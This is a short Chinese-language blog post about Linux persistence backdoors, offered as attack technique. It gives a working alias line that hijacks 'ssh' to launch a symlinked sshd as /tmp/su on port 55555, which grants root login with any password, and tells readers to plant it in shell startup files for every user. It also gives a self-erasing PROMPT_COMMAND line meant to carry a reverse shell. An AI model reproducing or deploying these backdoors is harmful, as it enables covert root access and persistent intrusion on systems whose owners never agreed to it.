权限控制组合拳

今天讲的是linux权限控制的手法，总结了下大概有以下这些：

最近也在总结这些方法，就想着是否可以将其中的控制手法组合起来形成一个新的手法呢？说干就干

alias + 软链接：

alias ssh='rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh'

我们写到环境变量中，有六种环境变量文件自己可以去了解（.bashrc、/etc/bashrc等），这样每个用户登录的时候都会生效

别名就是ssh现在就是别名等于的哪个指令

我们执行ssh相当于执行了rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh这一串

这就好办了，每当用户执行的时候就会生成一个软连接后门

实操一遍：

1、当使用ssh的时候就会成功的建立软链接

2、使用kali连接，这里是root用户密码随便输入，这时候我们就会是root权限

PROMPT_COMMAND后门，PROMPT_COMMAND就是没执行完一条指令的时候都会执行这个，才会输出root<span>@hjw123</span>:

这时候我们照样可以将其写入环境变量中

export PROMPT_COMMAND="(命令 &) 2> /dev/null;unset PROMPT_COMMAND"

这条指令是相当的牛逼，执行一次然后就会删除，十分的隐蔽，这里的命令可以使用反弹shell。

这里的实操可兄弟们自己实践，也算是一种提升

感谢大家的阅读，可加我分享内网知识流程图，内容还是相对全面的：

目的是想广交一些朋友带我一起提升web实战经验qq:702672860@qq.com